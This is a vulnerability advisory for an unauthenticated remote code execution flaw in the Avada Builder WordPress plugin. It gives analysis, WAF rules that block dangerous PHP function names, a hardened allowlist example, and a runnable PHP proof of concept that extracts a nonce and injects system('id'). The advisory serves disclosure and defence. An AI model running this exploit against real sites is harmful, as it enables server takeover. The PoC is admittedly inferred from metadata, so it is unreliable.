Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 20, 2026

CVE-2026-6279: Avada (Fusion) Builder <= 3.15.2 – Unauthenticated Remote Code Execution via PHP Function Injection via 'render_logics' Shortcode Attribute via Widget AJAX Handler (fusion-builder)

CVE ID: CVE-2026-6279
Severity: Critical (CVSS 9.8)
CWE: CWE-74
Vulnerable Version: 3.15.2
Patched Version:
Disclosed: May 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6279 (metadata-based): This vulnerability allows unauthenticated remote code execution via PHP function injection in the Avada Builder (fusion-builder) plugin for WordPress, versions up to and including 3.15.2. The CVSS score of 9.8 reflects the critical severity, with network-based exploitation requiring no authentication or user interaction.

The root cause lies in the wp_conditional_tags case within Fusion_Builder_Conditional_Render_Helper::get_value(). Based on the CWE-74 classification (Improper Neutralization of Special Elements in Output Used by a Downstream Component) and the description, Atomic Edge analysis infers that the plugin passes attacker-controlled values from a base64-decoded JSON blob directly to call_user_func() without implementing an allowlist or sanitization. The description confirms this pattern: values traverse from a decoded JSON payload into a PHP function call with no validation of which function or arguments can be invoked. Atomic Edge research cannot confirm the exact code path without a source code diff, but the CWE and description strongly indicate this is a classic function injection vulnerability where an attacker controls both the function name and its parameters.

Exploitation targets the fusion_get_widget_markup AJAX endpoint, registered for unauthenticated users via wp_ajax_nopriv_fusion_get_widget_markup. The endpoint requires a nonce (fusion_load_nonce), but this nonce is generated for user ID 0 and exposed in the JavaScript output of any public page containing a [fusion_post_cards] or [fusion_table_of_contents] element. The attacker extracts this nonce from the page source, then sends a POST request to /wp-admin/admin-ajax.php with action=fusion_get_widget_markup, the nonce, and a base64-encoded JSON blob containing the malicious function and parameters in the render_logics attribute. The payload reaches call_user_func() without allowlist filtering, enabling execution of arbitrary PHP functions like system(), exec(), or assert().

The patched version (3.15.3) likely implements an allowlist of permitted functions or uses a more restrictive approach such as whitelisting specific comparison operators and values, or replacing call_user_func() with a switch-case that validates the function name against a predefined set. The fix must sanitize and validate the decoded JSON data before passing any value to a PHP execution function.

Successful exploitation grants unauthenticated attackers the ability to execute arbitrary PHP code on the WordPress server. This leads to full site compromise, including data theft, creation of administrative accounts, file uploads, server takeover, and potential lateral movement within the hosting environment. The impact aligns with the CVSS vector’s confidentiality, integrity, and availability ratings set to HIGH.

ModSecurity Protection Against This CVE

Below are our ModSecurity-compatible rules to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-6279 (metadata-based)
# Blocks unauthenticated PHP function injection via Avada Builder's fusion_get_widget_markup AJAX endpoint
# Based on CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component
# This rule blocks POST requests to admin-ajax.php with the specific action and base64-encoded JSON payloads
# that contain function calls in the render_logics parameter

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-6279 Avada Builder RCE via fusion_get_widget_markup AJAX',severity:'CRITICAL',tag:'CVE-2026-6279',tag:'wordpress',tag:'avada-builder',tag:'rce'"
  SecRule ARGS_POST:action "@streq fusion_get_widget_markup" "chain"
    SecRule ARGS_POST:data "@rx function" "t:lowercase,t:urlDecode"

# Alternative rule targeting the base64-encoded payload pattern
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
  "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2026-6279 Avada Builder RCE via encoded payload',severity:'CRITICAL',tag:'CVE-2026-6279',tag:'wordpress',tag:'avada-builder',tag:'rce'"
  SecRule ARGS_POST:action "@streq fusion_get_widget_markup" "chain"
    SecRule ARGS_POST:data "@rx system|exec|shell_exec|passthru|popen|proc_open|assert|eval|base64_decode" "t:lowercase,t:urlDecode"
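One caveat on the rules above: they look for function names in the clear in the data parameter, while the analysis describes a condition_value that is base64-encoded, which does not expose those names, so treat the rules as a heuristic layer rather than a substitute for the code fix. The durable mitigation is the allowlist described in the patched-version paragraph. The following is an added example written for this write-up, not code from Avada Builder or Atomic Edge: it places the inferred CWE-74 shape (decoded JSON naming both the callable and its arguments) beside an allowlisted evaluator. The function names conditional_tag_value_unsafe and conditional_tag_value_safe, the JSON keys 'function' and 'args', and the list of permitted conditional tags are assumptions made for the illustration.

```php
<?php
// Added example for this write-up; not Avada Builder or Atomic Edge code.
// Names of functions, JSON keys and the allowlist contents are assumptions.

// Inferred vulnerable shape: whatever the decoded JSON names gets invoked.
function conditional_tag_value_unsafe(string $encoded): bool
{
    $data = json_decode(base64_decode($encoded), true);
    // Both the callable and its arguments come straight from the request.
    return (bool) call_user_func($data['function'], ...($data['args'] ?? []));
}

// Hardened shape: a fixed map of WordPress conditional tags to the maximum
// number of arguments each accepts. The lookup happens before any call.
const ALLOWED_CONDITIONAL_TAGS = [
    'is_front_page'     => 0,
    'is_home'           => 0,
    'is_single'         => 1, // is_single( $post )
    'is_page'           => 1, // is_page( $page )
    'is_category'       => 1, // is_category( $category )
    'is_user_logged_in' => 0,
];

// Returns the tag's boolean result, or null when the input is rejected.
function conditional_tag_value_safe(string $encoded): ?bool
{
    $json = base64_decode($encoded, true);          // strict mode rejects non-base64 input
    if ($json === false) {
        return null;
    }
    $data = json_decode($json, true);
    if (!is_array($data) || !isset($data['function']) || !is_string($data['function'])) {
        return null;
    }
    $tag = $data['function'];
    if (!array_key_exists($tag, ALLOWED_CONDITIONAL_TAGS)) {
        return null;                                // not allowlisted: never called
    }
    $args = $data['args'] ?? [];
    if (!is_array($args) || count($args) > ALLOWED_CONDITIONAL_TAGS[$tag]) {
        return null;                                // wrong arity for this tag
    }
    foreach ($args as $arg) {
        if (!is_scalar($arg)) {
            return null;                            // conditional tags take scalars only
        }
    }
    if (!function_exists($tag)) {
        return null;                                // WordPress not loaded (e.g. a CLI run)
    }
    return (bool) $tag(...array_values($args));
}

// Stand-in so the script runs outside WordPress; WordPress defines the real one.
if (!function_exists('is_front_page')) {
    function is_front_page(): bool { return true; }
}

// Constructed inputs: one allowlisted conditional tag, one arbitrary PHP function.
$legit    = base64_encode(json_encode(['function' => 'is_front_page', 'args' => []]));
$rejected = base64_encode(json_encode(['function' => 'phpversion',    'args' => []]));

var_dump(conditional_tag_value_safe($legit));    // accepted: allowlisted tag, arity 0
var_dump(conditional_tag_value_safe($rejected)); // rejected: not a conditional tag, returns null
```

The design point is that the request never chooses a callable: it chooses a key, and only a key present in ALLOWED_CONDITIONAL_TAGS is turned into a call, with its argument count and types checked first. A switch over the permitted names, as the analysis suggests the patch may use, achieves the same thing.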

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6279 - Avada (Fusion) Builder <= 3.15.2 - Unauthenticated Remote Code Execution via PHP Function Injection

// Configurable target URL
$target_url = 'http://example.com';

// Step 1: Fetch the target page to extract the nonce
// The nonce is usually in a script tag with id='fusion-post-cards-js-extra' or similar
$page_content = file_get_contents($target_url);
if ($page_content === false) {
    die("Error: Could not fetch target URL.\n");
}

// Extract the nonce from JavaScript variable fusion_load_nonce
// Pattern: "fusion_load_nonce":"<nonce_value>"
preg_match('/"fusion_load_nonce":"([a-f0-9]+)"/', $page_content, $matches);
if (empty($matches[1])) {
    // Try alternate pattern for standalone nonce script block
    preg_match('/var fusionNonce\s*=\s*"([a-f0-9]+)"/', $page_content, $matches);
}
if (empty($matches[1])) {
    die("Error: Could not extract fusion_load_nonce from page. Ensure the page contains a Fusion Post Cards or Table of Contents element.\n");
}
$nonce = $matches[1];
echo "[+] Extracted nonce: $nonce\n";

// Step 2: Craft the malicious payload
// The vulnerability passes base64-decoded JSON to call_user_func()
// We will inject system() with 'id' command as example
// The payload structure mimics what the plugin expects for render_logics attribute
$payload = [
    'widget_id' => 'example_widget',
    'render_logics' => [
        [
            'condition_type' => 'wp_conditional_tags',
            'condition_value' => base64_encode(json_encode([
                'function' => 'system',
                'args' => ['id']
            ]))
        ]
    ]
];

$post_data = [
    'action' => 'fusion_get_widget_markup',
    'fusion_load_nonce' => $nonce,
    'data' => json_encode($payload)
];

// Step 3: Send the exploit request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
if (curl_errno($ch)) {
    die("Error: cURL failed - " . curl_error($ch) . "\n");
}
curl_close($ch);

echo "[+] Server response:\n$response\n";
// Expected output contains the result of 'id' command if successful
// Example: "uid=33(www-data) gid=33(www-data) groups=33(www-data)"
